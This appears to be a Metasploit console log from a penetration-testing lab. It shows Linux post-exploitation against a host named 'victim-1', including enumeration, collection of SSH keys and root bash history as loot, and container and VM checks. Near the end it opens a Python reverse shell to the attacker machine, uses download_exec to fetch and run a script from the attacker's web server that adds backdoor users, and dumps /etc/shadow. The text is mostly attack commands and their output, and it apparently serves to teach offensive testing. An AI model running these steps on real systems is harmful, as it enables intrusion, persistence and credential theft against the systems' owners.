# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/enum_network normal No Linux Gather Network Information
msf5 post(multi/gather/env) > use post/linux/gather/enum_network
msf5 post(linux/gather/enum_network) > show options
Module options (post/linux/gather/enum_network):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/enum_network) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/enum_network) > run
[*] Running module against 192.111.31.3
[*] Module running as root
[+] Info:
[+] Debian GNU/Linux 8
[+] Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
[*] Collecting data...
[-] Failed to open file: /etc/ssh/sshd_config: core_channel_open: Operation failed: 1
[-] Unable to get data for Network config
[-] Unable to get data for Route table
[+] Firewall config stored in /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_061534.txt
[+] DNS config stored in /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_739761.txt
[-] Unable to get data for SSHD config
[+] Host file stored in /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_419887.txt
[+] SSH keys stored in /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_913508.txt
[-] Unable to get data for Active connections
[-] Unable to get data for Wireless information
[-] Unable to get data for Listening ports
[+] If-Up/If-Down stored in /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_777079.txt
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf5 post(linux/gather/enum_network) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.111.31.3 linux.enum.network text/plain Firewall config /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enu
m.netwo_061534.txt
192.111.31.3 linux.enum.network text/plain DNS config /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enu
m.netwo_739761.txt
192.111.31.3 linux.enum.network text/plain Host file /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enu
m.netwo_419887.txt
192.111.31.3 linux.enum.network text/plain SSH keys /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enu
m.netwo_913508.txt
192.111.31.3 linux.enum.network text/plain If-Up/If-Down /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enu
m.netwo_777079.txt
1
2
3
4
5
6
msf5 post(linux/gather/enum_network) > cat /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_739761.txt
[*] exec: cat /root/.msf4/loot/20230310152853_Linux_PE_192.111.31.3_linux.enum.netwo_739761.txt
search members.linode.com
nameserver 127.0.0.11
options edns0 trust-ad ndots:0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
msf5 post(linux/gather/enum_network) > search enum_protections
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/enum_protections normal No Linux Gather Protection Enumeration
msf5 post(linux/gather/enum_network) > use post/linux/gather/enum_protections
msf5 post(linux/gather/enum_protections) > show options
Module options (post/linux/gather/enum_protections):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/enum_protections) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/enum_protections) > run
[*] Running module against 192.111.31.3 [victim-1]
[*] Info:
[*] Debian GNU/Linux 8
[*] Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
[*] Finding system protections...
[+] ASLR is enabled
[+] SMEP is enabled
[+] SMAP is enabled
[+] Yama is installed and enabled
[*] Finding installed applications...
[+] iptables found: /sbin/iptables
[+] tcpdump found: /usr/sbin/tcpdump
[+] wireshark found: /usr/bin/wireshark
[*] System protections saved to notes.
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf5 post(linux/gather/enum_protections) > notes
Notes
=====
Time Host Service Port Protocol Type Data
---- ---- ------- ---- -------- ---- ----
2023-03-10 14:46:19 UTC 192.111.31.3 host.os.session_fingerprint {:name=>"192.111.31.3", :os=>"Debian 8.11 (Linux 5.4.0-125-gene
ric)", :arch=>"x64"}
2023-03-10 15:35:18 UTC 192.111.31.3 linux.protection "ASLR is enabled"
2023-03-10 15:35:18 UTC 192.111.31.3 linux.protection "SMEP is enabled"
2023-03-10 15:35:19 UTC 192.111.31.3 linux.protection "SMAP is enabled"
2023-03-10 15:35:19 UTC 192.111.31.3 linux.protection "Yama is installed and enabled"
2023-03-10 15:35:21 UTC 192.111.31.3 linux.protection "/sbin/iptables"
2023-03-10 15:35:26 UTC 192.111.31.3 linux.protection "/usr/sbin/tcpdump"
2023-03-10 15:35:29 UTC 192.111.31.3 linux.protection "/usr/bin/wireshark"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
msf5 post(linux/gather/enum_protections) > search enum_system
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/enum_system normal No Linux Gather System and User Information
msf5 post(linux/gather/enum_protections) > use post/linux/gather/enum_system
msf5 post(linux/gather/enum_system) > show options
Module options (post/linux/gather/enum_system):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/enum_system) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/enum_system) > run
[+] Info:
[+] Debian GNU/Linux 8
[+] Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
[+] Module running as "root" user
[*] Linux version stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_023977.txt
[*] User accounts stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_505181.txt
[*] Installed Packages stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_504764.txt
[*] Running Services stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_981652.txt
[*] Cron jobs stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_602329.txt
[*] Disk info stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_230170.txt
[*] Logfiles stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_029298.txt
[*] Setuid/setgid files stored in /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_921402.txt
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf5 post(linux/gather/enum_system) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.111.31.3 linux.enum.system text/plain Linux version /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_023977.txt
192.111.31.3 linux.enum.system text/plain User accounts /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_505181.txt
192.111.31.3 linux.enum.system text/plain Installed Packages /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_504764.txt
192.111.31.3 linux.enum.system text/plain Running Services /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_981652.txt
192.111.31.3 linux.enum.system text/plain Cron jobs /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_602329.txt
192.111.31.3 linux.enum.system text/plain Disk info /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_230170.txt
192.111.31.3 linux.enum.system text/plain Logfiles /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_029298.txt
192.111.31.3 linux.enum.system text/plain Setuid/setgid files /root/.msf4/loot/20230310153954_Linux_PE_192.111.31.3_linux.enum.syste_921402.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 post(linux/gather/enum_system) > search checkcontainer
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/checkcontainer normal No Linux Gather Container Detection
msf5 post(linux/gather/enum_system) > use post/linux/gather/checkcontainer
msf5 post(linux/gather/checkcontainer) > show options
Module options (post/linux/gather/checkcontainer):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/checkcontainer) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/checkcontainer) > run
[+] This appears to be a 'Docker' container
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
msf5 post(linux/gather/checkcontainer) > search checkvm
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/checkvm normal No Linux Gather Virtual Environment Detection
2 post/solaris/gather/checkvm normal No Solaris Gather Virtual Environment Detection
3 post/windows/gather/checkvm normal No Windows Gather Virtual Environment Detection
msf5 post(linux/gather/checkcontainer) > use post/linux/gather/checkvm
msf5 post(linux/gather/checkvm) > show options
Module options (post/linux/gather/checkvm):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/checkvm) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/checkvm) > run
[*] Gathering System info ....
[-] Failed to open file: /proc/scsi/scsi: core_channel_open: Operation failed: 1
[-] Post failed: NoMethodError undefined method `gsub' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/post/linux/gather/checkvm.rb:74:in `run'
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf5 post(linux/gather/checkvm) > search enum_users_history
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/enum_users_history normal No Linux Gather User History
msf5 post(linux/gather/checkvm) > use post/linux/gather/enum_users_history
msf5 post(linux/gather/enum_users_history) > show options
Module options (post/linux/gather/enum_users_history):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/enum_users_history) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/enum_users_history) > run
[+] Info:
[+] Debian GNU/Linux 8
[+] Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
[-] Failed to open file: /root/.ash_history: core_channel_open: Operation failed: 1
[+] bash history for root stored in /root/.msf4/loot/20230310155132_Linux_PE_192.111.31.3_linux.enum.users_721206.txt
[-] Failed to open file: /root/.csh_history: core_channel_open: Operation failed: 1
[-] Failed to open file: /root/.ksh_history: core_channel_open: Operation failed: 1
[-] Failed to open file: /var/lib/usbmux/.viminfo: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/sudoers: core_channel_open: Operation failed: 1
[+] Last logs stored in /root/.msf4/loot/20230310155201_Linux_PE_192.111.31.3_linux.enum.users_298782.txt
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
msf5 post(linux/gather/enum_users_history) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.111.31.3 linux.enum.users text/plain bash history for root /root/.msf4/loot/20230310155132_Linux_PE_192.111.31.3_linux.enum.users_721206.txt
192.111.31.3 linux.enum.users text/plain Last logs /root/.msf4/loot/20230310155201_Linux_PE_192.111.31.3_linux.enum.users_298782.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf5 post(linux/gather/enum_users_history) > cat /root/.msf4/loot/20230310155132_Linux_PE_192.111.31.3_linux.enum.users_721206.txt
[*] exec: cat /root/.msf4/loot/20230310155132_Linux_PE_192.111.31.3_linux.enum.users_721206.txt
whoami
cat /etc/passwd
groups root
cat /etc/*issue
unmae -r
uname -r
uname -a
ifconfig
ip a s
netstat -antp
ps aux
env
重启了一下实验室,补充最后两个模块:
Kali: 192.141.94.2
Target: 192.141.94.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
msf5 post(linux/gather/enum_users_history) > use post/multi/manage/system_session
msf5 post(multi/manage/system_session) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
6 shell cmd/unix 192.141.94.2:45369 -> 192.141.94.3:445 (192.141.94.3)
7 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.141.94.3 192.141.94.2:4433 -> 192.141.94.3:49134 (192.141.94.3)
msf5 post(multi/manage/system_session) > set SESSION 6
SESSION => 6
msf5 post(multi/manage/system_session) > info
Name: Multi Manage System Remote TCP Shell Session
Module: post/multi/manage/system_session
Platform: Linux, OSX, Unix
Arch:
Rank: Normal
Provided by:
Carlos Perez <carlos_perez@darkoperator.com>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER false yes Start an exploit/multi/handler to receive the connection
LHOST yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
SESSION 6 yes The session to run this module on.
TYPE auto yes Scripting environment on target to use for reverse shell (Accepted: auto, ruby, python, perl, bash)
Description:
This module will create a Reverse TCP Shell on the target system
using the system's own scripting environments installed on the
target.
msf5 post(multi/manage/system_session) > set HANDLER true
HANDLER => true
msf5 post(multi/manage/system_session) > set LHOST 192.141.94.2
LHOST => 192.141.94.2
msf5 post(multi/manage/system_session) > set LPORT 4444
LPORT => 4444
msf5 post(multi/manage/system_session) > set TYPE python
TYPE => python
msf5 post(multi/manage/system_session) > run
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.141.94.2:4444
[*] Python reverse shell selected
[*] Executing reverse tcp shell to 192.141.94.2 on port 4444
[*] Post module execution completed
msf5 post(multi/manage/system_session) > [*] Command shell session 8 opened (192.141.94.2:4444 -> 192.141.94.3:52896) at 2023-03-11 03:49:23 +0000
msf5 post(multi/manage/system_session) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
6 shell cmd/unix 192.141.94.2:45369 -> 192.141.94.3:445 (192.141.94.3)
7 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.141.94.3 192.141.94.2:4433 -> 192.141.94.3:49134 (192.141.94.3)
8 shell sparc/bsd /bin/sh: 0: can't access tty; job control turned off # 192.141.94.2:4444 -> 192.141.94.3:52896 (192.141.94.3)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msf5 post(multi/manage/system_session) > echo "useradd hacker\nuseradd test\nuseradd nick" > test.sh
[*] exec: echo "useradd hacker\nuseradd test\nuseradd nick" > test.sh
msf5 post(multi/manage/system_session) > pwd
[*] exec: pwd
/root
msf5 post(multi/manage/system_session) > cat test.sh
[*] exec: cat test.sh
useradd hacker
useradd test
useradd nick
msf5 post(multi/manage/system_session) > /etc/init.d/apache2 start
[*] exec: /etc/init.d/apache2 start
Starting Apache httpd web server: apache2.
msf5 post(multi/manage/system_session) > cp test.sh /var/www/html/
[*] exec: cp test.sh /var/www/html/
msf5 post(linux/manage/download_exec) > curl http://192.141.94.2/test.sh
[*] exec: curl http://192.141.94.2/test.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 41 100 41 0 0 20500 0 --:--:-- --:--:-- --:--:-- 20500
useradd hacker
useradd test
useradd nick
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
msf5 post(multi/manage/system_session) > use post/linux/manage/download_exec
msf5 post(linux/manage/download_exec) > info
Name: Linux Manage Download and Execute
Module: post/linux/manage/download_exec
Platform: Linux
Arch:
Rank: Normal
Provided by:
Joshua D. Abraham <jabra@praetorian.com>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
URL yes Full URL of file to download.
Description:
This module downloads and runs a file with bash. It first tries to
uses curl as its HTTP client and then wget if it's not found. Bash
found in the PATH is used to execute the file.
msf5 post(linux/manage/download_exec) > set SESSION 7
SESSION => 7
msf5 post(linux/manage/download_exec) > set URL http://192.141.94.2/test.sh
URL => http://192.141.94.2/test.sh
msf5 post(linux/manage/download_exec) > run
[*] Checking if curl exists in the path...
[*] Checking if wget exists in the path...
[!] neither curl nor wget available in the $PATH, aborting...
[*] Post module execution completed
msf5 post(linux/manage/download_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
6 shell cmd/unix 192.141.94.2:45369 -> 192.141.94.3:445 (192.141.94.3)
7 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.141.94.3 192.141.94.2:4433 -> 192.141.94.3:49134 (192.141.94.3)
8 shell sparc/bsd /bin/sh: 0: can't access tty; job control turned off # 192.141.94.2:4444 -> 192.141.94.3:52896 (192.141.94.3)
msf5 post(linux/manage/download_exec) > set SESSION 6
SESSION => 6
msf5 post(linux/manage/download_exec) > run
[!] SESSION may not be compatible with this module.
[*] Checking if curl exists in the path...
[+] curl available, using it
[*] Checking if bash exists in the path...
[+] bash available, using it
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf5 post(linux/manage/download_exec) > sessions 6
[*] Starting interaction with 6...
cat /etc/shadow
root:*:17774:0:99999:7:::
daemon:*:17774:0:99999:7:::
bin:*:17774:0:99999:7:::
sys:*:17774:0:99999:7:::
sync:*:17774:0:99999:7:::
games:*:17774:0:99999:7:::
man:*:17774:0:99999:7:::
lp:*:17774:0:99999:7:::
mail:*:17774:0:99999:7:::
news:*:17774:0:99999:7:::
uucp:*:17774:0:99999:7:::
proxy:*:17774:0:99999:7:::
www-data:*:17774:0:99999:7:::
backup:*:17774:0:99999:7:::
list:*:17774:0:99999:7:::
irc:*:17774:0:99999:7:::
gnats:*:17774:0:99999:7:::
nobody:*:17774:0:99999:7:::
systemd-timesync:*:17774:0:99999:7:::
systemd-network:*:17774:0:99999:7:::
systemd-resolve:*:17774:0:99999:7:::
systemd-bus-proxy:*:17774:0:99999:7:::
messagebus:*:17812:0:99999:7:::
colord:*:17812:0:99999:7:::
saned:*:17812:0:99999:7:::
usbmux:*:17812:0:99999:7:::
hacker:!:19427:0:99999:7:::
test:!:19427:0:99999:7:::
nick:!:19427:0:99999:7:::
